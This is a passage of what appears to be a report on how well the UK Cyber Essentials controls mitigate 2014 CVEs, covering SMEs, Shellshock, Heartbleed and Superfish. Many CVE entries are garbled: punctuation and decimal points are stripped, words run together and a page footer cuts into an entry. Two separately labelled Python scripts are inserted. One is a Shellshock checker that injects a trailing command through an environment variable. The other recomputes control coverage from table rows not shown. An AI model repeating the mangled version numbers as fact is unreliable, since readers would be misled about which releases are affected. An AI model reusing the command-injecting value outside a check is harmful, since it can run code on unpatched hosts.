The byte-swapping implementation in copyfile in Apple OS X before 10.9.4 allows remote attackers to execute arbitrary code or cause a denial of service (out-of-bounds memory access and application crash) via a crafted AppleDouble file in a ZIP archive.

CVE-2014-1379
Graphics Drivers in Apple OS X before 10.9.4 allows attackers to gain privileges or cause a denial of service (NULL pointer dereference and system crash) via a 32-bit executable file for a crafted application.

CVE-2014-1382
WebKit, as used in Apple iOS before 7.1.2, Apple Safari before 6.1.5 and 7.x before 7.0.5, and Apple TV before 6.1.2, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-06-30-1, APPLE-SA-2014-06-30-3, and APPLE-SA-2014-06-30-4.

CVE-2014-1466
SQL injection vulnerability in CSP MySQL User Manager 2.3 allows remote attackers to execute arbitrary SQL commands via the login field of the login page.

CVE-2014-1472
Multiple cross-site scripting (XSS) vulnerabilities in the Enterprise Manager in McAfee Vulnerability Manager (MVM) 7.5.5 and earlier allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.

CVE-2014-1477
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 27.0, Firefox ESR 24.x before 24.3, Thunderbird before 24.3, and SeaMonkey before 2.24 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.

CVE-2014-1518
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 29.0, Firefox ESR 24.x before 24.5, Thunderbird before 24.5, and SeaMonkey before 2.26 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.

CVE-2014-1563
Use-after-free vulnerability in the mozilla::DOMSVGLength::GetTearOff function in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption) via an SVG animation with DOM interaction that triggers incorrect cycle collection.

CVE-2014-1565
The mozilla::dom::AudioEventTimeline function in the Web Audio API implementation in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 does not properly create audio timelines, which allows remote attackers to obtain sensitive information from process memory or cause a denial of service (out-of-bounds read) via crafted API calls.

CVE-2014-1586
content/base/src/nsDocument.cpp in Mozilla Firefox before 33.0, Firefox ESR 31.x before 31.2, and Thunderbird 31.x before 31.2 does not consider whether WebRTC video sharing is occurring, which allows remote attackers to obtain sensitive information from the local camera in certain IFRAME situations by maintaining a session after the user temporarily navigates away.

CVE-2014-1701
The GenerateFunction function in bindings/scripts/code_generator_v8.pm in Blink, as used in Google Chrome before 33.0.1750.149, does not implement a certain cross-origin restriction for the EventTarget::dispatchEvent function, which allows remote attackers to conduct Universal XSS (UXSS) attacks via vectors involving events.

CVE-2014-1740
Multiple use-after-free vulnerabilities in net/websockets/websocket_job.cc in the WebSockets implementation in Google Chrome before 34.0.1847.137 allow remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to WebSocketJob deletion.

CVE-2014-1744
Integer overflow in the AudioInputRendererHost::OnCreateStream function in content/browser/renderer_host/media/audio_input_renderer_host.cc in Google Chrome before 35.0.1916.114 allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors that trigger a large shared-memory allocation.

CVE-2014-1753
Microsoft Internet Explorer 6 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2014-1806
The .NET Remoting implementation in Microsoft .NET Framework 1.1 SP1, 2.0 SP2, 3.5, 3.5.1, 4, 4.5, and 4.5.1 does not properly restrict memory access, which allows remote attackers to execute arbitrary code via vectors involving malformed objects, aka "TypeFilterLevel Vulnerability".

CVE-2014-1808
Microsoft Office 2013 Gold, SP1, RT, and RT SP1 allows remote attackers to obtain sensitive token information via a web site that sends a crafted response during opening of an Office document, aka "Token Reuse Vulnerability".

CVE-2014-1811
The TCP implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows remote attackers to cause a denial of service (non-paged pool memory consumption and system hang) via malformed data in the Options field of a TCP header, aka "TCP Denial of Service Vulnerability".

CVE-2014-1812
The Group Policy implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 does not properly handle distribution of passwords, which allows remote authenticated users to obtain sensitive credential information and consequently gain privileges by leveraging access to the SYSVOL share, as exploited in the wild in May 2014, aka "Group Policy Preferences Password Elevation of Privilege Vulnerability".

CVE-2014-2014
imapsync before 1.584, when running with the --tls option, attempts a cleartext login when a certificate verification failure occurs, which allows remote attackers to obtain credentials by sniffing the network.

CVE-2014-2103
Cisco Intrusion Prevention System (IPS) Software allows remote attackers to cause a denial of service (MainApp process outage) via malformed SNMP packets, aka Bug IDs CSCum52355 and CSCul49309.

CVE-2014-2109
The TCP Input module in Cisco IOS 12.2 through 12.4 and 15.0 through 15.4, when NAT is used, allows remote attackers to cause a denial of service (memory consumption or device reload) via crafted TCP packets, aka Bug IDs CSCuh33843 and CSCuj41494.

CVE-2014-2364
Multiple stack-based buffer overflows in Advantech WebAccess before 7.2 allow remote attackers to execute arbitrary code via a long string in the (1) ProjectName, (2) SetParameter, (3) NodeName, (4) CCDParameter, (5) SetColor, (6) AlarmImage, (7) GetParameter, (8) GetColor, (9) ServerResponse, (10) SetBaud, or (11) IPAddress parameter to an ActiveX control in (a) webvact.ocx, (b) dvs.ocx, or (c) webdact.ocx.

CVE-2014-2416
Unspecified vulnerability in the Oracle Data Integrator component in Oracle Fusion Middleware 11.1.1.3.0 allows remote attackers to affect availability via unknown vectors related to Data Quality, a different vulnerability than CVE-2014-2407, CVE-2014-2415, CVE-2014-2417, and CVE-2014-2418.

CVE-2014-2554
OTRS 3.1.x before 3.1.21, 3.2.x before 3.2.16, and 3.3.x before 3.3.6 allows remote attackers to conduct clickjacking attacks via an IFRAME element.

CVE-2014-2643
Unspecified vulnerability in HP Systems Insight Manager (SIM) before 7.4 allows remote authenticated users to gain privileges via unknown vectors.

CVE-2014-2742
Isode M-Link before 16.0v7 does not properly restrict the processing of compressed XML elements, which allows remote attackers to cause a denial of service (resource consumption) via a crafted XMPP stream, aka an "xmppbomb" attack.

CVE-2014-2768
Microsoft Internet Explorer 6 through 8 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2773.

CVE-2014-2789
Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2795, CVE-2014-2798, and CVE-2014-2804.


CVE-2014-2791
Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2014-2794
Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2788.

CVE-2014-2808
Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2796, CVE-2014-2825, CVE-2014-4050, CVE-2014-4055, and CVE-2014-4067.

CVE-2014-2821
Microsoft Internet Explorer 8 and 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2014-3444
The GetGUID function in codecs/dmp4.dll in RealNetworks RealPlayer 16.0.3.51 and earlier allows remote attackers to execute arbitrary code or cause a denial of service (write access violation and application crash) via a malformed 3gp file.

CVE-2014-3489
lib/util/miq-password.rb in Red Hat CloudForms 3.0 Management Engine (CFME) before 5.2.4.2 uses a hard-coded salt, which makes it easier for remote attackers to guess passwords via a brute force attack.

CVE-2014-3507
Memory leak in d1_both.c in the DTLS implementation in OpenSSL 0.9.8 before 0.9.8zb, 1.0.0 before 1.0.0n, and 1.0.1 before 1.0.1i allows remote attackers to cause a denial of service (memory consumption) via zero-length DTLS fragments that trigger improper handling of the return value of a certain insert function.

CVE-2014-3556
The STARTTLS implementation in mail/ngx_mail_smtp_handler.c in the SMTP proxy in nginx 1.5.x and 1.6.x before 1.6.1 and 1.7.x before 1.7.4 does not properly restrict I/O buffering, which allows man-in-the-middle attackers to insert commands into encrypted SMTP sessions by sending a cleartext command that is processed after TLS is in place, related to a "plaintext command injection" attack, a similar issue to CVE-2011-0411.

CVE-2014-3580
The mod_dav_svn Apache HTTPD server module in Apache Subversion 1.x before 1.7.19 and 1.8.x before 1.8.11 allows remote attackers to cause a denial of service (NULL pointer dereference and server crash) via a REPORT request for a resource that does not exist.

CVE-2014-3814
The Juniper Networks NetScreen Firewall devices with ScreenOS before 6.3r17, when configured to use the internal DNS lookup client, allows remote attackers to cause a denial of service (crash and reboot) via a sequence of malformed packets to the device IP.

CVE-2014-3819
Juniper Junos 11.4 before 11.4R12, 12.1 before 12.1R10, 12.1X44 before 12.1X44-D35, 12.1X45 before 12.1X45-D25, 12.1X46 before 12.1X46-D20, 12.1X47 before 12.1X47-D10, 12.2 before 12.2R8, 12.3 before 12.3R7, 13.1 before 13.1R4, 13.2 before 13.2R4, 13.3 before 13.3R2, and 14.1 before 14.1R1, when Auto-RP is enabled, allows remote attackers to cause a denial of service (RDP routing process crash and restart) via a malformed PIM packet.

CVE-2014-3872
Multiple SQL injection vulnerabilities in the administration login page in D-Link DAP-1350 (Rev. A1) with firmware 1.14 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) username or (2) password.

CVE-2014-4044
OpenAFS 1.6.8 does not properly clear the fields in the host structure, which allows remote attackers to cause a denial of service (uninitialized memory access and crash) via unspecified vectors related to TMAY requests.

CVE-2014-4079
Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.

CVE-2014-4082
Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2014-4100
Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.

CVE-2014-4105
Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.

CVE-2014-4114
Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to execute arbitrary code via a crafted OLE object in an Office document, as exploited in the wild with a "Sandworm" attack in June through October 2014, aka "Windows OLE Remote Code Execution Vulnerability".

CVE-2014-4127
Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2014-4130
Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-4132 and CVE-2014-4138.

CVE-2014-4132
Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-4130 and CVE-2014-4138.

CVE-2014-4133
Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-4137.

CVE-2014-4141
Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2014-4481
Integer overflow in CoreGraphics in Apple iOS before 8.1.3, Apple OS X before 10.10.2, and Apple TV before 7.0.3 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted PDF document.

CVE-2014-4617The do uncompress function ing10compressc in GnuPG 1x before1417 and 2x before 2024 allows context-dependent attackers to cause a denialof service (infinite loop) via malformedcompressed packets as demonstrated by

CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 25 of 28

an a3 01 5b ff byte sequence

CVE-2014-4631RSA Adaptive Authentication (On-Premise)6021 through 71 P3 when using devicebinding in a Challenge SOAP call orusing the RSA Adaptive AuthenticationIntegration Adapters with Out-of-BandPhone (Authentify) functionality conductspermanent device binding even whenauthentication fails which allows remoteattackers to bypass authentication

CVE-2014-5528The Appsflyer library for Android does notverify X509 certificates from SSL serverswhich allows man-in-the-middle attackersto spoof servers and obtain sensitiveinformation via a crafted certificate

CVE-2014-6040rdquoGNU C Library (aka glibc) before 220allows context-dependent attackers to causea denial of service (out-of-bounds readand crash) via a multibyte character valueof rdquordquo0xffffrdquordquo to the iconv function whenconverting (1) IBM933 (2) IBM935 (3)IBM937 (4) IBM939 or (5) IBM1364encoded data to UTF-8rdquo

CVE-2014-6105IBM Security Identity Manager 6x before6003 IF14 allows remote attackers toconduct clickjacking attacks via unspecifiedvectors

CVE-2014-6136IBM Security AppScan Standard 8x and 9xbefore 9011 FP1 supports unencryptedsessions which allows remote attackers toobtain sensitive information by sniffing thenetwork

CVE-2014-6164IBM WebSphere Application Server80x before 80010 and 85x before8554 allows remote attackers to spoofOpenID and OpenID Connect cookies andconsequently obtain sensitive informationvia a crafted URL

CVE-2014-6363rdquovbscriptdll in Microsoft VBScript 56through 58 as used with Internet Explorer6 through 11 and other products allowsremote attackers to execute arbitrarycode or cause a denial of service(memory corruption) via a crafted website aka rdquordquoVBScript Memory CorruptionVulnerabilityrdquordquordquo

CVE-2014-6369rdquoMicrosoft Internet Explorer 9 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo

CVE-2014-6378Juniper Junos 114 before R12-S4 121X44before D35 121X45 before D30 121X46before D25 121X47 before D10 122before R9 122X50 before D70 123 beforeR7 131 before R4 before S3 131X49before D55 131X50 before D30 132before R5 132X50 before D20 132X51before D26 and D30 132X52 before D15133 before R3 and 141 before R1 allowsremote attackers to cause a denial of service(router protocol daemon crash) via a craftedRSVP PATH message

CVE-2014-6487Unspecified vulnerability in the OracleIdentity Manager component in OracleFusion Middleware 11115 1111711121 and 11122 allows remoteauthenticated users to affect integrity viaunknown vectors related to End User SelfService

CVE-2014-7250The TCP stack in 43BSD Net2 as usedin FreeBSD 54 NetBSD possibly 20 andOpenBSD possibly 36 does not properlyimplement the session timer which allowsremote attackers to cause a denial of service(resource consumption) via crafted packets

CVE-2014-7927The SimplifiedLoweringDoLoadBufferfunction in compilersimplified-loweringccin Google V8 as used in Google Chromebefore 400221491 does not properlychoose an integer data type which allowsremote attackers to cause a denial ofservice (memory corruption) or possiblyhave unspecified other impact via craftedJavaScript code

CVE-2014-7945OpenJPEG before r2908 as used inPDFium in Google Chrome before400221491 allows remote attackersto cause a denial of service (out-of-boundsread) via a crafted PDF document relatedto j2kc jp2c and t2c

CVE-2014-8447Adobe Reader and Acrobat 10x before10113 and 11x before 11010 on Windows

and OS X allow attackers to executearbitrary code or cause a denial of service(memory corruption) via unspecified vectorsa different vulnerability than CVE-2014-8445 CVE-2014-8446 CVE-2014-8456CVE-2014-8458 CVE-2014-8459 CVE-2014-8461 and CVE-2014-9158

CVE-2014-8638The navigatorsendBeacon implementationin Mozilla Firefox before 350 FirefoxESR 31x before 314 Thunderbird before314 and SeaMonkey before 232 omitsthe CORS Origin header which allowsremote attackers to bypass intended CORSaccess-control checks and conduct cross-site request forgery (CSRF) attacks via acrafted web site

CVE-2014-8835rdquoThe xpc data get bytes function in libxpcin Apple OS X before 10102 does not verifythat a dictionaryrsquos Attributes key has thexpc data data type which allows attackersto execute arbitrary code by providing acrafted dictionary to sysmond related toan rdquordquoXPC type confusionrdquordquo issuerdquo

CVE-2014-9159Heap-based buffer overflow in AdobeReader and Acrobat 10x before 10113and 11x before 11010 on Windows andOS X allows attackers to execute arbitrarycode via unspecified vectors a differentvulnerability than CVE-2014-8457 and CVE-2014-8460

CVE-2014-9163Stack-based buffer overflow in Adobe FlashPlayer before 1300259 and 14x and 15xbefore 1500246 on Windows and OS Xand before 112202425 on Linux allowsattackers to execute arbitrary code viaunspecified vectors as exploited in the wildin December 2014

CVE-2014-9350rdquoTP-Link TL-WR740N 4 with firmware3170 Build 140520 3166 Build 130529and 3164 Build 130205 allows remoteattackers to cause a denial of service(httpd crash) via vectors involving ardquordquonewrdquordquo value in the isNew parameter toPingIframeRpmhtmrdquo

CVE-2014-9357Docker 132 allows remote attackers toexecute arbitrary code with root privilegesvia a crafted (1) image or (2) build in aDockerfile in an LZMA (xz) archive relatedto the chroot for archive extraction


Survey Responses



certificate, which itself can be easily gathered from any other machine running Superfish, and they have full access to any SSL-secured connection from the target machine.

Thankfully, while the risk to users and SMEs was high, the fix is a simple one-time run of a removal tool provided by Lenovo themselves [11], and the issue is fully mitigated through the Cyber Essentials patch management advice.

Threat Analysis

ShellShock: Without Cyber Essentials in place, SMEs 1 and 2 would be at risk from 'Shellshock', as they both operate Unix/Linux-based systems that would require patching to plug the security issue. The extent to which SMEs 3 and 4 are vulnerable to this issue is unclear, as their heavy dependency on outside service providers leaves them in a position where they are both unable to determine their vulnerability and unable to remedy it.

With Cyber Essentials, SMEs 1 and 2 would be fully protected, and it is likely that SMEs 3 and 4 are also protected if their external providers also follow Cyber Essentials or another security and patching scheme.
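As an added example that is not part of the report, the following Python check answers the question the paragraph above leaves open for SMEs 3 and 4: whether a given Unix/Linux host is still exposed to Shellshock (CVE-2014-6271, reference [13]). It runs the locally installed bash with an environment variable shaped like an exported function definition followed by a command; an unpatched bash executes that trailing command while importing the function, a patched one does not. The sentinel string, the function names and the wording of the result are this example's own.

```python
"""Shellshock (CVE-2014-6271) exposure check for a Unix/Linux host.

Added example, not part of the report. It hands bash an environment
variable that looks like an exported function definition with trailing
code; an unpatched bash runs the trailing code while importing the
function, which is the bug Shellshock names.
"""
import shutil
import subprocess

# Constructed sentinel: only an unpatched bash ever prints it.
MARKER = "cve-2014-6271-trailing-code-ran"


def build_probe_env(marker=MARKER):
    """Environment that triggers the bug: a variable whose value is a
    function body followed by a command. A patched bash ignores the
    trailing command (and, since the fix, no longer imports functions
    from plain variables at all)."""
    return {
        "PATH": "/usr/local/bin:/usr/bin:/bin",
        "x": "() { :; }; echo " + marker,
    }


def check_shellshock(bash_path=None, timeout=10):
    """Return True if the local bash is vulnerable to CVE-2014-6271,
    False if it is patched, or None when no usable bash is available."""
    bash = bash_path or shutil.which("bash")
    if bash is None:
        return None
    try:
        proc = subprocess.run(
            [bash, "-c", "true"],  # the command itself prints nothing
            env=build_probe_env(),
            capture_output=True, text=True, timeout=timeout,
        )
    except OSError:  # binary missing or not executable
        return None
    return MARKER in proc.stdout


def report(result):
    """Map the probe outcome onto the report's own vocabulary."""
    if result is None:
        return "bash not found: Shellshock does not apply to this host"
    if result:
        return "Not Mitigated: bash executes trailing code from the environment; apply the vendor patch"
    return "Mitigated: bash is patched against CVE-2014-6271"


if __name__ == "__main__":
    print(report(check_shellshock()))
```

Run it on every host the patch-management process claims to have covered (locally, or over SSH); a True result means the vendor update has not actually landed on that machine, and a None result means no bash is present, which also rules the bug out there. The probe covers the original bug only; the later related bash bugs need the vendor's complete patch set rather than this single test.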

Heartbleed: The 'Heartbleed' bug is another vulnerability that, without the Cyber Essentials guidelines being followed, would have laid companies' external-facing services open to malicious attackers.

In all cases, however, each SME can be fully protected with a combination of patch management, firewalling and application of access controls from the Cyber Essentials guidelines.

SuperFish: All of the SMEs we interviewed could be exceedingly vulnerable to the 'Superfish' issue without Cyber Essentials, as much of their operations revolve around SSL-encrypted communications. A break in the chain of trust for their certificates would allow an attacker to man-in-the-middle their communications.

Normal system updates would have failed to remedy the situation, as the fix provided by Lenovo consisted of a tool to be run in addition to the normal operating system patches. It is further debatable how effective Cyber Essentials patch management would have been in plugging this vulnerability, as it would require that the administrators be aware of the issue and know of the fix, rather than simply following 'normal' patching guidelines. Assuming that the persons responsible for the equipment are aware of the issue, however, Cyber Essentials patch management fully mitigates it.


Conclusions

The Cyber Essentials security tools have been shown to mitigate, or to mitigate as soon as a patch is released, all vulnerabilities from remote attackers that do not exploit fundamentally insecure software or hardware. Of the two hundred vulnerabilities collected, eight exploits could not be resolved by deploying security patches; for vulnerabilities such as these the only mitigation available is simply not to install the compromised systems. To help prevent deployments being susceptible to attacks on faulty systems, it may be recommended that a blacklist of such items is composed for public reference.

Scope: It is important to consider that the scope of this study covers only internet-based, commodity-level attacks, and although the Cyber Essentials tools perform very well in mitigating these, they do not represent full security. There is an increasingly identified risk from insiders that also requires attention, not least from malicious acts but also from users unknowingly compromising security.

The SMEs interviewed represent organisations from a range of market sectors: web development and online presence, specialist scientific services, the hospitality industry, and finance.

Additional Tools

The 10 Steps to Cyber Security [2] identifies additional security measures that complement the Cyber Essentials scheme well, delivering additional security through indirect measures such as User Education and Awareness along with Network and Systems Monitoring. These measures would bolster cyber security by equipping each employee of the SME with the necessary knowledge of safe practice, its importance, and some basic technical understanding, just as they may be versed in environmental awareness. Network and Systems Monitoring allows remote user logins, as well as file access and activity, to be logged. For very small networks this may currently be infeasible, as the extra manpower or finances required for such a system are costly. However, for larger organisations additional monitoring capability should be explored as a future extension to Cyber Essentials, not just to identify and mitigate malicious action from more bespoke and sophisticated attacks than those reported on here, but also to provide evidence for any potential cyber-crime investigations.

There exist some collective approaches to improving cyber security; a notable example is the Cyber-security Information Sharing Partnership (CiSP) [4]. The partnership aims to benefit all members by providing real-time updates on cyber-security issues and discovered vulnerabilities, as well as best-practice guides and other cyber-threat information. It would be beneficial for more organisations to belong to cyber-security collectives like this, creating networks of informed individuals working together to tackle cyber-crime. This would be particularly useful for quickly identifying potential vulnerabilities and available patches which, as shown in this report, is critical for the CE patch management control to fully mitigate the related vulnerabilities.

An important note concerns the security of business affiliates and service providers. Even if an SME has Cyber Essentials in place, any use of cloud services relies on the vendor's security controls for threat mitigation. In other words, cloud email, accounting and any other cloud-based or remote services are only as secure as the service provider makes them. In general, cloud providers should hold their security practice to a high level of scrutiny and should be encouraged to certify their protection. Hewlett-Packard (HP) has taken this further and has begun to strengthen its entire supply chain (some 600 SMEs) with the Cyber Essentials accreditation. This provides protection across the entirety of Hewlett-Packard's operations as well as its affiliates. This should be a goal for organisations of all sizes, minimising the risk from cyber threats by ensuring all trading partners uphold the same high levels of security.

Cyber Essentials Controls

Of the five current Cyber Essentials controls, Patch Management was considered to aid in the mitigation of the highest proportion of remote attacks (87.5%); counter-intuitively, the survey responses ranked patch management last in use among SMEs. The controls in widest use are those providing the most intuitive or easily understood protection: data loss prevention, strong passwords and firewalls. Patch management, by contrast, is not necessarily understood by individuals as a tool that greatly improves cyber security.

Anti-Malware was useful in mitigating the fewest vulnerabilities (10%). It is, however, important to note that anti-malware is largely the only security tool that may routinely scan the network hardware and software, as well as any items downloaded from the internet or received as email attachments. This serves as a last line of defence and as such is vital to an organisation's cyber safety.
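The following Python recomputes figures of the kind quoted above from rows of the Cyber Controls Applicability table in this report. It is an added example, not the report's own analysis tooling: the ten rows are a subset copied from that table, so the shares come out different from the 87.5% and 10% quoted for the full set of two hundred; the alias table that folds the report's labels ('Strong Passwords', 'User Access', 'Anti-Malware') onto the five Cyber Essentials controls, and the decision not to credit a control on 'Don't install' rows, are this example's assumptions.

```python
"""Per-control coverage from a CVE-to-mitigation mapping.

Added example, not the report's own analysis tooling. ROWS is a subset of
the Cyber Controls Applicability table in this report (CVE, applicability
flags for SME 1..4 and the idealised SME, and the "With CE" cell). The
ALIASES table, which folds the report's labels onto the five Cyber
Essentials controls, is an assumption made here.
"""
import re
from collections import Counter

ROWS = [
    ("CVE-2013-0008", "yyyyy", "Mitigated - Firewall, Secure Configuration (User Policy), Anti-Malware"),
    ("CVE-2013-0022", "ynyyn", "Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting"),
    ("CVE-2013-0140", "ynnnn", "Partially Mitigated - Patch Management"),
    ("CVE-2013-0172", "ynnnn", "Mitigated - User Access (Strong Password), Patch Management"),
    ("CVE-2013-1140", "nnnnn", "Not Mitigated - Secure Configuration (Don't install)"),
    ("CVE-2013-1620", "yyyyn", "Partially Mitigated - Patch Management & Firewall"),
    ("CVE-2013-2803", "nnnnn", "Mitigated - Strong Passwords, Patch Management"),
    ("CVE-2013-3893", "ynyyn", "Mitigated - Patch Management, Secure Configuration - no JS"),
    ("CVE-2013-6475", "nyynn", "Mitigated - Anti-Malware, Firewall, Patch Management"),
    ("CVE-2013-7004", "ynnyn", "Mitigated - Firewall, Secure Configuration, Firmware Management"),
]

SME_LABELS = ("SME 1", "SME 2", "SME 3", "SME 4", "Idealised")

# Report label (lower-cased, qualifier stripped) -> Cyber Essentials control.
# Labels not listed here (Website Blacklisting, Firmware Management) are kept
# verbatim: the report applies them, but they are not among the five controls.
ALIASES = {
    "firewall": "Firewall",
    "secure configuration": "Secure Configuration",
    "patch management": "Patch Management",
    "anti-malware": "Malware Protection",
    "access policy": "Access Control",
    "access control": "Access Control",
    "user access": "Access Control",
    "strong passwords": "Access Control",
}


def parse_with_ce(cell):
    """Split a 'With CE' cell into (status, [normalised control names])."""
    status, _, rest = cell.partition(" - ")
    controls = []
    for item in re.split(r",|\s&\s", rest):
        # Drop qualifiers such as "(Secure Browser)" or "- no JS".
        name = re.split(r"\s*\(|\s-\s", item)[0].strip()
        if name:
            controls.append(ALIASES.get(name.lower(), name))
    return status.strip(), controls


def status_counts(rows):
    """How many rows end up Mitigated / Partially Mitigated / Not Mitigated."""
    return Counter(parse_with_ce(cell)[0] for _, _, cell in rows)


def control_coverage(rows):
    """Share of all rows whose (at least partial) mitigation names each control."""
    hits = Counter()
    for _, _, cell in rows:
        status, controls = parse_with_ce(cell)
        if status == "Not Mitigated":
            continue  # "Don't install" rows: no control actually closes the hole
        hits.update(set(controls))
    return {control: round(n / len(rows), 3) for control, n in hits.items()}


def sme_exposure(rows):
    """Number of listed CVEs flagged as applying to each SME estate."""
    counts = Counter()
    for _, flags, _ in rows:
        counts.update(label for label, flag in zip(SME_LABELS, flags) if flag == "y")
    return {label: counts[label] for label in SME_LABELS}


if __name__ == "__main__":
    for control, share in sorted(control_coverage(ROWS).items(), key=lambda kv: -kv[1]):
        print(f"{control:<22} {share:6.1%}")
    print(dict(status_counts(ROWS)))
    print(sme_exposure(ROWS))
```

Feeding the full table through the same functions is the quickest way to check a quoted proportion against its source data; the normalisation step matters because the report's cells name the same control several ways, and a naive string count would split Access Control across three labels.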

Recommendations

To further improve cyber security across the UK, we recommend that:

1. Collective approaches to cyber security should be further encouraged. In particular, a governmental or collective approach to identifying inherently flawed products should be developed. This could be in addition to, or as an extension of, current initiatives like CiSP, which can make a difference in detecting and reacting to potential vulnerabilities in a timely manner.

2. Further research into the mitigation of other cyber threats is carried out, to explore the risk from insider threats and targeted attacks.

3. Further employee education is strongly encouraged, especially to be able to tackle the other types of attack mentioned above, which were not within the scope of this report.


References

[1] Centre for the Protection of National Infrastructure, CESG, Cabinet Office, and Department for Business, Innovation and Skills. Cyber security guidance for business. https://www.gov.uk/government/publications/cyber-risk-management-a-board-level-responsibility, September 2012.

[2] Centre for the Protection of National Infrastructure, CESG, Cabinet Office, and Department for Business, Innovation & Skills. 10 steps to cyber security. https://www.gov.uk/government/publications/cyber-risk-management-a-board-level-responsibility, September 2012.

[3] CESG, UK Trade & Investment, Prime Minister's Office, 10 Downing Street, Centre for the Protection of National Infrastructure, Government Communications Headquarters, and Department for Business, Innovation and Skills. Cyber security boost for UK firms. https://www.gov.uk/government/news/cyber-security-boost-for-uk-firms, January 2015.

[4] Centre for the Protection of National Infrastructure, CiSP, CERT-UK, and Department for Business, Innovation & Skills. Cyber-security Information Sharing Partnership (CiSP). https://www.cert.gov.uk/cisp, March 2013.

